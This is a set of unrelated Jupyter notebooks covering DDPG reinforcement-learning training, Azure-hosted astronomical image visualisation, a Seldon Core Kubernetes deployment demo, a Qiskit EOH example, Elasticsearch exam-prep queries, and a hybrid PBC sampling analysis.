# Calculate targets: Double DDPG
target_q = critic.predict_target(
s2_batch, actor.predict(s2_batch))
else:
# Calculate targets
target_q = critic.predict_target(
s2_batch, actor.predict_target(s2_batch))
y_i = []
for k in range(int(args['minibatch_size'])):
if t_batch[k]:
y_i.append(r_batch[k])
else:
y_i.append(r_batch[k] + critic.gamma * target_q[k])
# Update the critic given the targets
predicted_q_value, _ = critic.train(
s_batch, a_batch, np.reshape(y_i, (int(args['minibatch_size']), 1)))
ep_ave_max_q += np.amax(predicted_q_value)
# Update the actor policy using the sampled gradient
a_outs = actor.predict(s_batch)
grads = critic.action_gradients(s_batch, a_outs)
actor.train(s_batch, grads[0])
# Update target networks
if args['target_hard_copy_flag']:
if ep_steps % args['target_hard_copy_interval'] == 0:
actor.update_target_network()
critic.update_target_network()
else:
actor.update_target_network()
critic.update_target_network()
s = s2
ep_reward += r
ep_steps += 1
# if terminal or reach maximum length
if terminal:
summary_str = sess.run(summary_ops, feed_dict={
summary_vars[0]: ep_reward,
summary_vars[1]: ep_ave_max_q / float((ep_steps + 1))
})
writer.add_summary(summary_str, i)
writer.flush()
ep_stats = '| Episode: {0} | Steps: {1} | Reward: {2:.4f} | Qmax: {3:.4f}'.format(i,
(ep_steps + 1),
ep_reward,
(ep_ave_max_q / float(ep_steps+1)))
print(ep_stats)
logging.info(ep_stats)
break
def main(args):
with tf.Session() as sess:
env = gym.make(args['env'])
np.random.seed(int(args['random_seed']))
tf.set_random_seed(int(args['random_seed']))
env.seed(int(args['random_seed']))
state_dim = env.observation_space.shape[0]
# Set action_dim for continuous and discrete action space
if args['continuous_act_space_flag'] is True:
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low).all()
else:
action_dim = env.action_space.n
# If discrete action, actor uses Softmax and action_bound is always 1
action_bound = 1
# Use hardcopy way to update target NNs.
if args['target_hard_copy_flag'] is True:
args['tau'] = 1.0
actor = ActorNetwork(sess, args['continuous_act_space_flag'],
state_dim, action_dim, action_bound,
float(args['actor_lr']), float(args['tau']),
int(args['minibatch_size']))
critic = CriticNetwork(sess, state_dim, action_dim,
float(args['critic_lr']), float(args['tau']),
float(args['gamma']),
actor.get_num_trainable_vars())
actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))
# Record videos
# Use the gym env Monitor wrapper
if args['use_gym_monitor_flag']:
monitor_dir = os.path.join(args['summary_dir'], 'gym_monitor')
env = wrappers.Monitor(env, monitor_dir,
resume=True,
video_callable=lambda count: count % args['record_video_every'] == 0)
train(sess, env, args, actor, critic, actor_noise)
if args['use_gym_monitor_flag']:
env.monitor.close()
else:
env.close()
# +
# if __name__ == '__main__':
# parser = argparse.ArgumentParser(description='provide arguments for DDPG agent')
# # agent parameters
# parser.add_argument('--actor-lr', type=float, default=0.0001, help='actor network learning rate')
# parser.add_argument('--critic-lr', type=float, default=0.001, help='critic network learning rate')
# parser.add_argument('--gamma', type=float, default=0.99, help='discount factor for critic updates')
# parser.add_argument('--tau', type=float, default=0.001, help='soft target update parameter')
# parser.add_argument('--buffer-size', type=int, default=1000000, help='max size of the replay buffer')
# parser.add_argument('--minibatch-size', type=int, default=64, help='size of minibatch for minibatch-SGD')
# parser.add_argument("--continuous-act-space-flag", action="store_true", help='act on continuous action space')
# parser.add_argument("--exploration-strategy", type=str, choices=["action_noise", "epsilon_greedy"],
# default='epsilon_greedy', help='action_noise or epsilon_greedy')
# parser.add_argument("--epsilon-max", type=float, default=1.0, help='maximum of epsilon')
# parser.add_argument("--epsilon-min", type=float, default=.01, help='minimum of epsilon')
# parser.add_argument("--epsilon-decay", type=float, default=.001, help='epsilon decay')
# # train parameters
# parser.add_argument('--double-ddpg-flag', action="store_true", help='True, if run double-ddpg-flag. Otherwise, False.')
# parser.add_argument('--target-hard-copy-flag', action="store_true", help='Target network update method: hard copy')
# parser.add_argument('--target-hard-copy-interval', type=int, default=200, help='Target network update hard copy interval')
# # run parameters
# # HalfCheetah-v2, Ant-v2, InvertedPendulum-v2, Pendulum-v0
# parser.add_argument('--env', type=str, default='HalfCheetah-v2', help='choose the gym env- tested on {Pendulum-v0}')
# parser.add_argument('--random-seed', type=int, default=1234, help='random seed for repeatability')
# parser.add_argument('--max-episodes', type=int, default=50000, help='max num of episodes to do while training')
# # parser.add_argument("--max-episode-len", type=int, default=1000, help='max length of 1 episode')
# parser.add_argument("--render-env-flag", action="store_true", help='render environment')
# parser.add_argument("--use-gym-monitor-flag", action="store_true", help='record gym results')
# parser.add_argument("--record-video-every", type=int, default=1, help='record video every xx episodes')
# parser.add_argument("--monitor-dir", type=str, default='./results/gym_ddpg', help='directory for storing gym results')
# parser.add_argument("--summary-dir", type=str, default='./results/tf_ddpg/HalfCheetah-v2/ddpg_Tau_0.001_run1', help='directory for storing tensorboard info')
# parser.set_defaults(use_gym_monitor=False)
# # args = vars(parser.parse_args())
# # args = parser.parse_args()
# args = vars(parser.parse_args())
# pp.pprint(args)
# if not os.path.exists(args['summary_dir']):
# os.makedirs(args['summary_dir'])
# log_dir = os.path.join(args['summary_dir'], 'ddpg_running_log.log')
# logging.basicConfig(filename=log_dir, filemode='a', level=logging.INFO)
# for key in args.keys():
# logging.info('{0}: {1}'.format(key, args[key]))
# main(args)
# # python ddpg_discrete_action.py --env
# +
args = {'actor_lr': 0.0001,
'buffer_size': 1000000,
'continuous_act_space_flag': True,
'critic_lr': 0.001,
'double_ddpg_flag': True,
'env': 'RoboschoolAnt-v1',
'epsilon_decay': 0.001,
'epsilon_max': 1.0,
'epsilon_min': 0.01,
'exploration_strategy': 'epsilon_greedy',
'gamma': 0.99,
'max_episodes': 5000,
'minibatch_size': 64,
'monitor_dir': './results/gym_ddpg',
'random_seed': 1234,
'record_video_every': 1,
'render_env_flag': False,
'summary_dir': '../results2/BipedalWalker-v2/double_ddpg_softcopy_epsilon_greedy_run_test_log3',
'target_hard_copy_flag': False,
'target_hard_copy_interval': 200,
'tau': 0.001,
'use_gym_monitor': False,
'use_gym_monitor_flag': False}
if not os.path.exists(args['summary_dir']):
os.makedirs(args['summary_dir'])
log_dir = os.path.join(args['summary_dir'], 'ddpg_running_log.log')
logging.basicConfig(filename=log_dir,
filemode='a',
level=logging.INFO,
format='%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
for key in args.keys():
logging.info('{0}: {1}'.format(key, args[key]))
main(args)
# -
|
ddpg_discrete_notebook.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PoC ESO
# language: python
# name: eso
# ---
# +
#------------------------------------------------------------------------------
# Based on Repley's clothes descriptor
#------------------------------------------------------------------------------
import os, uuid, sys
#import subprocess
#import tqdm
import random
import astropy
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#from scipy.misc import imsave
#import time
#import multiprocessing
#from io import BytesIO
from astropy.io import fits
#from functools import partial
from azure.storage.blob import BlockBlobService, PublicAccess
# +
# #!pip install azure-storage-blob
# Create the BlockBlockService that is used to call the Blob service
# for the storage account
import config_blob_keys as cfg
account_name = cfg.AccountName
account_key = cfg.AccountKey
block_blob_service = BlockBlobService(account_name=account_name,
account_key=account_key)
container_name_proc = cfg.ContNameProc
block_blob_service.set_container_acl(container_name_proc,
public_access=PublicAccess.Container)
# +
# Create a list "filelist" with the blob content
# inside the "Azure:container/folder" location
def BlobList(container, folder, filelist, verbose=False):
gen = block_blob_service.list_blobs(container, prefix=folder)
for blob in gen:
file = str(blob.name).replace(folder,'')
filelist.append(file)
if verbose == True:
print("\t Blob name: " + blob.name)
return filelist
# Download a file "blobfile" from "container" and save it
# in the file "locfile"
def DownBlob(container, blobfile, locfile, verbose=False):
if verbose == True:
print('Downloading ' + blobfile + ' to ' + locfile)
block_blob_service.get_blob_to_path(container,
blobfile,
locfile)
# Get the .fits image from blob storage and return the associated data
# It uses the DownBlob function
def VisualImage(impath, arm, imnamea, imanameb, verbose=False):
hdu_list = fits.open(impath)
#print(hdu_list.info())
hdu = hdu_list[arm]
im_data=hdu.data
im_median=np.median(im_data)
im_std=np.std(im_data)
print("Mean: ", np.mean(im_data))
print("Median: ", im_median)
print("StdDev: ", im_std)
fig, ax = plt.subplots(figsize=(4,8))
plt.imshow(im_data, origin='lower', interpolation='nearest', vmin=im_median-im_std, vmax=im_median+2*im_std)
plt.tight_layout()
plt.xlabel('x')
plt.ylabel('y')
plt.show()
fig.savefig(imnamea)
fig, ax = plt.subplots(figsize=(8,4))
plt.hist(np.ndarray.flatten(im_data), bins=50, range=[im_median/2, im_median*10])
ax.set_yscale('log')
plt.xlabel('counts')
plt.ylabel('# counts')
plt.show()
fig.savefig(imnameb)
def DisplayImage(impath, imnamea, imanameb, verbose=False):
im_data=np.load(impath)
im_median=np.median(im_data)
im_std=np.std(im_data)
print("Mean: ", np.mean(im_data))
print("Median: ", im_median)
print("StdDev: ", im_std)
fig, ax = plt.subplots(figsize=(3,4))
plt.imshow(im_data, origin='lower', interpolation='nearest', vmin=im_median-im_std, vmax=im_median+2*im_std, cmap='Greys_r')
plt.tight_layout()
plt.xlabel('x')
plt.ylabel('y')
plt.show()
fig.savefig(imnamea)
fig, ax = plt.subplots(figsize=(8,4))
plt.hist(np.ndarray.flatten(im_data), bins=50, range=[im_median/2, im_median*10])
ax.set_yscale('log')
plt.xlabel('counts')
plt.ylabel('# counts')
plt.show()
fig.savefig(imnameb)
# +
# Bias Blue
#BlobSubDirs = 'bias_blue'#, 'bias_red', 'blue_arc_flat','red_arc_flat']
#blob_sub_dir = BlobSubDirs
#good_file = 'UVES.2010-05-09T10:48:24.977.fits'
#bad_file = 'UVES.2010-10-26T09:32:08.896.fits'
#fits_files = [good_file, bad_file]
#arm = 0
# Bias Blue
cont_name_desc = 'processed'
blob_sub_dir = 'UVES_BLUE_WAVE'
extension = 'ext1'
nsample=5
npy_folder_rem = os.path.join('numpy', blob_sub_dir)
npy_folder_rem = os.path.join(npy_folder_rem, extension)
npy_files_list = []
BlobList(cont_name_desc, npy_folder_rem, npy_files_list)
if len(npy_files_list) >= nsample:
npy_files_list = random.sample(npy_files_list, nsample)
#files_dict = {'good':['UVES.2016-09-14T10:02:58.217.fits', 'UVES.2017-05-07T08:58:17.533.fits','UVES.2019-03-02T09:48:36.576.fits'],
# 'bad_set2':['UVES.2015-12-09T08:48:05.206.fits', 'UVES.2018-05-09T11:18:08.186.fits', 'UVES.2015-12-07T08:55:07.048.fits'],
# 'bad':['UVES.2010-10-26T09:35:11.190.fits']}
#files_dict = {'good':['UVES.2016-09-14T10:02:58.217.fits', 'UVES.2017-05-07T08:58:17.533.fits','UVES.2019-03-02T09:48:36.576.fits'],
# 'bad_set1':['UVES.2010-10-26T09:32:08.896.fits', 'UVES.2010-10-26T09:32:54.480.fits', 'UVES.2010-10-26T09:33:40.043.fits'],
# 'bad_set2':['UVES.2015-12-09T08:48:05.206.fits', 'UVES.2018-05-09T11:18:08.186.fits', 'UVES.2015-12-07T08:55:07.048.fits']}
#print(files_dict)
arm = 0
# Blue Arc Flat
#BlobSubDirs = 'blue_arc_flat'#, 'bias_red', 'blue_arc_flat','red_arc_flat']
#blob_sub_dir = BlobSubDirs
#good_file = 'UVES.2010-02-27T17:48:25.456.fits'
#bad_file = 'UVES.2015-12-05T20:55:25.270.fits'
#fits_files = [good_file, bad_file]
#arm = 1
# Red Arc Flat
#BlobSubDirs = 'red_arc_flat'#, 'bias_red', 'blue_arc_flat','red_arc_flat']
#blob_sub_dir = BlobSubDirs
#good_file = 'UVES.2010-07-30T23:36:46.453.fits'
#bad_file = 'UVES.2014-01-11T18:47:56.548.fits'
#fits_files = [good_file, bad_file]
#arm = 1
path_loc = './Test'
#for file in fits_files:
for npy_file in npy_files_list:
print("\nProcessing image file : ", npy_file)
loc_file = path_loc + npy_file
rem_file = npy_folder_rem + npy_file
DownBlob(container_name_fits, rem_file, loc_file, True)
while not os.path.exists(loc_file):
time.sleep(0.1)
imnamea = loc_file.replace('.npy', 'a.png')
imnameb = loc_file.replace('.npy', 'b.png')
DisplayImage(loc_file, imnamea, imnameb)
#VisualImage(loc_file, arm, imnamea, imnameb)
# -
|
data_proccessing/10_Visualize_Image.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Deploying Machine Learning Models Minikube with RBAC using kubectl
# This demo shows how you can interact directly with kubernetes using kubectl to create and manage runtime machine learning models. It uses Minikube as the target Kubernetes cluster.
# <img src="images/deploy-graph.png" alt="predictor with canary" title="ml graph"/>
# ## Prerequistes
# You will need
# - [Git clone of Seldon Core](https://github.com/SeldonIO/seldon-core)
# - [Helm](https://github.com/kubernetes/helm)
# - [Minikube](https://github.com/kubernetes/minikube) version v0.24.0 or greater
# - [python grpc tools](https://grpc.io/docs/quickstart/python.html)
#
# # Create Cluster
#
# Start minikube and ensure custom resource validation is activated and there is 5G of memory.
#
# **2018-06-13** : At present we find the most stable version of minikube across platforms is 0.25.2 as there are issues with 0.26 and 0.27 on some systems. We also find the default VirtualBox driver can be problematic on some systems to we suggest using the [KVM2 driver](https://github.com/kubernetes/minikube/blob/master/docs/drivers.md#kvm2-driver).
#
# Your start command would then look like:
# ```
# minikube start --vm-driver kvm2 --memory 4096 --feature-gates=CustomResourceValidation=true --extra-config=apiserver.Authorization.Mode=RBAC
# ```
# # Setup
# !kubectl create namespace seldon
# !kubectl create clusterrolebinding kube-system-cluster-admin --clusterrole=cluster-admin --serviceaccount=kube-system:default
# # Install Helm
# !kubectl -n kube-system create sa tiller
# !kubectl create clusterrolebinding tiller --clusterrole cluster-admin --serviceaccount=kube-system:tiller
# !helm init --service-account tiller
# Label the node to allow load testing to run on it
# !kubectl label nodes `kubectl get nodes -o jsonpath='{.items[0].metadata.name}'` role=locust --overwrite
# ## Start seldon-core
# Install the custom resource definition
# !helm install ../helm-charts/seldon-core-crd --name seldon-core-crd --set usage_metrics.enabled=true
# !helm install ../helm-charts/seldon-core --name seldon-core --namespace seldon
# Install prometheus and grafana for analytics
# !helm install ../helm-charts/seldon-core-analytics --name seldon-core-analytics \
# --set grafana_prom_admin_password=password \
# --set persistence.enabled=false \
# --namespace seldon
# Check all services are running before proceeding.
# !kubectl get pods -n seldon
# ## Set up REST and gRPC methods
#
# **Ensure you port forward the seldon api-server REST and GRPC ports**:
#
# REST:
# ```
# kubectl port-forward $(kubectl get pods -n seldon -l app=seldon-apiserver-container-app -o jsonpath='{.items[0].metadata.name}') -n seldon 8002:8080
# ```
#
# GRPC:
# ```
# kubectl port-forward $(kubectl get pods -n seldon -l app=seldon-apiserver-container-app -o jsonpath='{.items[0].metadata.name}') -n seldon 8003:5000
# ```
# Install gRPC modules for the prediction protos.
# !cp ../proto/prediction.proto ./proto
# !python -m grpc.tools.protoc -I. --python_out=. --grpc_python_out=. ./proto/prediction.proto
# Illustration of both REST and gRPC requests.
# +
import requests
from requests.auth import HTTPBasicAuth
from proto import prediction_pb2
from proto import prediction_pb2_grpc
import grpc
try:
from commands import getoutput # python 2
except ImportError:
from subprocess import getoutput # python 3
API_HTTP="localhost:8002"
API_GRPC="localhost:8003"
def get_token():
payload = {'grant_type': 'client_credentials'}
response = requests.post(
"http://"+API_HTTP+"/oauth/token",
auth=HTTPBasicAuth('oauth-key', 'oauth-secret'),
data=payload)
print(response.text)
token = response.json()["access_token"]
return token
def rest_request():
token = get_token()
headers = {'Authorization': 'Bearer '+token}
payload = {"data":{"names":["a","b"],"tensor":{"shape":[2,2],"values":[0,0,1,1]}}}
response = requests.post(
"http://"+API_HTTP+"/api/v0.1/predictions",
headers=headers,
json=payload)
print(response.text)
def grpc_request():
token = get_token()
datadef = prediction_pb2.DefaultData(
names = ["a","b"],
tensor = prediction_pb2.Tensor(
shape = [3,2],
values = [1.0,1.0,2.0,3.0,4.0,5.0]
)
)
request = prediction_pb2.SeldonMessage(data = datadef)
channel = grpc.insecure_channel(API_GRPC)
stub = prediction_pb2_grpc.SeldonStub(channel)
metadata = [('oauth_token', token)]
response = stub.Predict(request=request,metadata=metadata)
print(response)
# -
# # Integrating with Kubernetes API
# ## Validation
# Using OpenAPI Schema certain basic validation can be done before the custom resource is accepted.
# !kubectl create -f resources/model_invalid1.json -n seldon
# ## Normal Operation
# A simple example is shown below we use a single prepacked model for illustration. The spec contains a set of predictors each of which contains a ***componentSpec*** which is a Kubernetes [PodTemplateSpec](https://kubernetes.io/docs/api-reference/v1.9/#podtemplatespec-v1-core) alongside a ***graph*** which describes how components fit together.
# !pygmentize resources/model.json
# ## Create Seldon Deployment
# Deploy the runtime graph to kubernetes.
# !kubectl apply -f resources/model.json -n seldon
# !kubectl get seldondeployments -n seldon
# !kubectl describe seldondeployments seldon-deployment-example -n seldon
# Get the status of the SeldonDeployment. **When ready the replicasAvailable should be 1**.
# !kubectl get seldondeployments seldon-deployment-example -o jsonpath='{.status}' -n seldon
# ## Get predictions
# #### REST Request
rest_request()
# #### gRPC Request
grpc_request()
# ## Update deployment with canary
# We will change the deployment to add a "canary" deployment. This illustrates:
# - Updating a deployment with no downtime
# - Adding an extra predictor to run alongside th exsting predictor.
#
# You could manage different traffic levels by controlling the number of replicas of each.
# !pygmentize resources/model_with_canary.json
# !kubectl apply -f resources/model_with_canary.json -n seldon
# Check the status of the deployments. Note: **Might need to run several times until replicasAvailable is 1 for both predictors**.
# !kubectl get seldondeployments seldon-deployment-example -o jsonpath='{.status}' -n seldon
# #### REST Request
rest_request()
# #### gRPC request
grpc_request()
# ## Load test
# Start a load test which will post REST requests at 10 requests per second.
# !helm install seldon-core-loadtesting --name loadtest \
# --set locust.host=http://seldon-core-seldon-apiserver:8080 \
# --set oauth.key=oauth-key \
# --set oauth.secret=oauth-secret \
# --namespace seldon \
# --repo https://storage.googleapis.com/seldon-charts
# You should port-foward the grafana dashboard
#
# ```bash
# kubectl port-forward $(kubectl get pods -n seldon -l app=grafana-prom-server -o jsonpath='{.items[0].metadata.name}') -n seldon 3000:3000
# ```
#
# You can then iew an analytics dashboard inside the cluster at http://localhost:3000/dashboard/db/prediction-analytics?refresh=5s&orgId=1. Your IP address may be different. get it via minikube ip. Login with:
# - Username : admin
# - password : password (as set when starting seldon-core-analytics above)
#
# The dashboard should look like below:
#
#
# <img src="images/dashboard.png" alt="predictor with canary" title="ml graph"/>
# # Tear down
# !helm delete loadtest --purge
# !kubectl delete -f resources/model_with_canary.json -n seldon
# !helm delete seldon-core-analytics --purge
# !helm delete seldon-core --purge
# !helm delete seldon-core-crd --purge
|
notebooks/kubectl_demo_minikube_rbac.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## _*The EOH (Evolution of Hamiltonian) Algorithm*_
#
# This notebook demonstrates how to use the `Qiskit Aqua` library to invoke the EOH algorithm and process the result.
#
# Further information may be found for the algorithms in the online [Aqua documentation](https://qiskit.org/documentation/aqua/algorithms.html).
#
# For this particular demonstration, we illustrate the `EOH` algorithm. First, two `WeightedPauliOperator` instances we created are randomly generated Hamiltonians.
# +
import numpy as np
from qiskit import BasicAer
from qiskit.transpiler import PassManager
from qiskit.aqua import QuantumInstance
from qiskit.aqua.operators import MatrixOperator, op_converter
from qiskit.aqua.algorithms import EOH
from qiskit.aqua.components.initial_states import Custom
num_qubits = 2
temp = np.random.random((2 ** num_qubits, 2 ** num_qubits))
qubit_op = op_converter.to_weighted_pauli_operator(MatrixOperator(matrix=temp + temp.T))
temp = np.random.random((2 ** num_qubits, 2 ** num_qubits))
evo_op = op_converter.to_weighted_pauli_operator(MatrixOperator(matrix=temp + temp.T))
# -
# For EOH, we would like to evolve some initial state (e.g. the uniform superposition state) with `evo_op` and do a measurement using `qubit_op`. Below, we illustrate how such an example dynamics process can be easily prepared.
evo_time = 1
num_time_slices = 1
state_in = Custom(qubit_op.num_qubits, state='uniform')
eoh = EOH(qubit_op, state_in, evo_op, evo_time=evo_time, num_time_slices=num_time_slices)
# We can then configure the quantum backend and execute our `EOH` instance:
# +
backend = BasicAer.get_backend('statevector_simulator')
quantum_instance = QuantumInstance(backend)
ret = eoh.run(quantum_instance)
print('The result is\n{}'.format(ret))
|
aqua/eoh.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .sh
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Bash
# language: bash
# name: bash
# ---
# +
curl -XDELETE localhost:9200/klausurvorbereitung?pretty
curl -XPUT localhost:9200/klausurvorbereitung?pretty -d'
{
"mappings" : {
"movies" : {
"properties": {
"title" : {
"type" : "text",
"analyzer" : "standard"
},
"year" : {
"type" : "short"
},
"runtime" : {
"type": "short"
},
"director": {
"type": "keyword"
},
"videocodec": {
"type": "keyword"
},
"budget": {
"type": "integer"
}
}
}
}
}'
# Beispiel:
# Title = Pulp Fiction
# Year = 1994
# director = <NAME>
# videocodec = x264 (kann auch sein: h264, AVC, h265, MPEG-2, MPEG-4, XviD)
# +
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Pulp Fiction",
"year": 1994,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Reservoir Dogs",
"year": 1992,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "<NAME>",
"year": 1997,
"director": "<NAME>",
"videocodec": "x264",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Kill Bill Vol.1",
"year": 2003,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Kill Bill Vol.2",
"year": 2004,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Full Metal Jacket",
"year": 1987,
"director": "<NAME>",
"videocodec": "x264",
"budget": 150
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "2001: A Space Odyssey",
"year": 1968,
"director": "<NAME>",
"videocodec": "x264",
"budget": 200
}'
# -
curl -XPOST localhost:9200/klausurvorbereitung/movies/_search?pretty -d '{
"query" :{
"match" : {
"title" : "kill"
}
}
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies/_search?pretty -d '
{
"query" :{
"bool": {
"must": {
"term" : {
"videocodec" : "AVC"
}
},
"filter": [
{"range": { "year": { "from" : 1994, "to": 2000} } }
]
}
}
}'
curl -XGET 'localhost:9200/klausurvorbereitung/_search?pretty'
# ### Anmerkung:
# By default, queries will use the analyzer defined in the field mapping,
# but this can be overridden with the search_analyzer setting
curl -XPOST localhost:9200/klausurvorbereitung/movies/_search?pretty -d '
{
"size":0,
"aggs" :{
"by_codec" : {
"terms" : {
"field" : "videocodec"
},
"aggs": {
"by_year": {
"terms": {
"field": "year"
}
}
}
}
}
}'
# +
curl -XPOST 'localhost:9200/klausurvorbereitung/movies/_search?pretty' -d '
{
"size": 0,
"aggs":{
"by_director": {
"terms": {
"field": "director"
},
"aggs": {
"sum_budget": {
"stats": { "field": "budget" }
}
}
}
}
}'
# -
curl -XGET 'http://localhost:9200/klausurvorbereitung/movies/_search?pretty' -d '
{
"query": {
"fuzzy" : {
"title" : "Rexervoir"
}
}
}
'
# <NAME>
# <NAME>
# <NAME>
# <NAME>
# ...
#
|
Klausurvorbereitung.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Analysis the results of hybrid PBC
#
# In this notebook, we will analyse the results obtained for the **Toy Example 2** using our hybrid PBC script.
#
# We run the script simulating **1 virtual qubit** and demanding a precision $\epsilon_{desired} = 0.01\,.$
#
# The number of samples is being determined as:
# $$
# N = \frac{20 \cdot \sum_{i=1}^{\chi} \alpha_i^2}{\epsilon^2_{desired}}\,,
# $$
# and the actual relative error $\epsilon_{actual}$ as:
#
# $$
# \epsilon_{actual} = \sqrt{20} \frac{\sigma_{samples}}{\sqrt{N}}\,.
# $$
#
# Note that since necessarily $\sigma_{samples}^2 \leq \sum_{i=1}^{\chi} \alpha_i^2$ then $\epsilon_{actual} \leq \epsilon_{desired}\,.$
#
# As a result, we will have 95%-confidence intervals given by $\mathbb{E}(\xi) \pm \epsilon_{actual}\,.$
# +
import math
import json
import numpy as np
from math import sqrt
from matplotlib import pyplot as plt
# -
def nr_samples(precision, virtual_qubits):
weights_1vq = [1 / 2, (1 - sqrt(2)) / 2, 1 / sqrt(2)]
sum_squares = 0
for i in range(3**virtual_qubits):
label = np.base_repr(i, base=3)
label = str(label)
if not len(label) == virtual_qubits:
label = '0' * (virtual_qubits - len(label)) + label
weight = 1
for s in label:
weight = weight * weights_1vq[int(s)]
sum_squares += abs(weight)**2
N = int(math.ceil(20 * sum_squares / precision**2))
return N
# +
precision = [0.1, 0.09, 0.07, 0.05, 0.03, 0.02, 0.01]
vq = 1 # choosing 1 virtual qubit
samples = []
for p in precision:
samples.append(nr_samples(p, vq))
print(samples)
# -
# Because we run the code for the precision $\epsilon = 0.01$, we should have a total of $158\,579$ values to use for the computation of the probability $p\,.$
# We can use those values to estimate the expected value of this probability and determine how close it is to the exact value $p= 1/2 - \sqrt{2}/4.$
#
# We can also determine the standard deviation of the sample, and use it to compute the appropriate confidence interval.
#
# Since we have access to smaller sets of values as well, we can use the first $M$ values to estimate the results that would have been obtained if we have requested a different precision (e.g., $\epsilon = \{ 0.10,\, 0.09,\, 0.07,\, 0.05,\, 0.03,\, 0.02 \}$).
exact_value = 1/2 - sqrt(2)/4
print(round(exact_value, 6))
# + [markdown] tags=[]
# ## $\epsilon = 0.01 \Rightarrow N= 158\, 579$
# -
with open('Resources_data--probabilities.txt', 'r') as file_object:
probabilities1 = json.load(file_object)
# +
probabilities1 = np.array(probabilities1)
prec = precision[-1]
print(len(probabilities1) == samples[-1])
mean1 = np.mean(probabilities1)
std1 = np.std(probabilities1)
error1 = sqrt(20) * std1 / sqrt(len(probabilities1))
print(f'p= {round(mean1, 4)} +/- {round(error1, 4)}')
print(error1 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.02 \Rightarrow N= 39\, 645$
# -
probabilities2 = probabilities1[0:samples[-2]]
# +
prec = precision[-2]
print(len(probabilities2) == samples[-2])
mean2 = np.mean(probabilities2)
std2 = np.std(probabilities2)
error2 = sqrt(20) * std2 / sqrt(len(probabilities2))
print(f'p= {round(mean2, 4)} +/- {round(error2, 4)}')
print(error2 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.03 \Rightarrow N= 17\, 620$
# -
probabilities3 = probabilities1[0:samples[-3]]
# +
prec = precision[-3]
print(len(probabilities3) == samples[-3])
mean3 = np.mean(probabilities3)
std3 = np.std(probabilities3)
error3 = sqrt(20) * std3 / sqrt(len(probabilities3))
print(f'p= {round(mean3, 4)} +/- {round(error3, 4)}')
print(error3 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.05 \Rightarrow N= 6\, 344$
# -
probabilities4 = probabilities1[0:samples[-4]]
# +
prec = precision[-4]
print(len(probabilities4) == samples[-4])
mean4 = np.mean(probabilities4)
std4 = np.std(probabilities4)
error4 = sqrt(20) * std4 / sqrt(len(probabilities4))
print(f'p= {round(mean4, 4)} +/- {round(error4, 4)}')
print(error4 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.07 \Rightarrow N= 3\, 237$
# -
probabilities5 = probabilities1[0:samples[-5]]
# +
prec = precision[-5]
print(len(probabilities5) == samples[-5])
mean5 = np.mean(probabilities5)
std5 = np.std(probabilities5)
error5 = sqrt(20) * std5 / sqrt(len(probabilities5))
print(f'p= {round(mean5, 4)} +/- {round(error5, 4)}')
print(error5 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.09 \Rightarrow N= 1\, 958$
# -
probabilities6 = probabilities1[0:samples[-6]]
# +
prec = precision[-6]
print(len(probabilities6) == samples[-6])
mean6 = np.mean(probabilities6)
std6 = np.std(probabilities6)
error6 = sqrt(20) * std6 / sqrt(len(probabilities6))
print(f'p= {round(mean6, 4)} +/- {round(error6, 4)}')
print(error6 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.100 \Rightarrow N= 1\, 586$
# -
probabilities7 = probabilities1[0:samples[-7]]
# +
prec = precision[-7]
print(len(probabilities7) == samples[-7])
mean7 = np.mean(probabilities7)
std7 = np.std(probabilities7)
error7 = sqrt(20) * std7 / sqrt(len(probabilities7))
print(f'p= {round(mean7, 4)} +/- {round(error7, 4)}')
print(error7 < prec)
# -
# ---
# + [markdown] tags=[]
# ## Plotting the data:
# +
means = [mean7, mean6, mean5, mean4, mean3, mean2, mean1]
errors = [error7, error6, error5, error4, error3, error2, error1]
bot_bar = [means[i] - errors[i] for i in range(len(means))]
heights = [2*errors[i] for i in range(len(means))]
# +
fig = plt.figure()
plt.bar([i for i in range(len(means))],
heights,
width=0.8,
bottom=bot_bar,
